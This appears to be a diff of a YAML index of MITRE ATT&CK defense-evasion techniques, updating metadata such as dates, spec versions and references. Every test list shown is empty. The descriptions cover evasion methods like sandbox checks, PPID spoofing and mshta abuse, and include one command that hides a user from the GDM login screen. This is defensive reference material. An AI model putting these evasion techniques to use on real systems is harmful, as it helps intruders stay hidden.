-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8146,7 +8255,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests: []
   T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
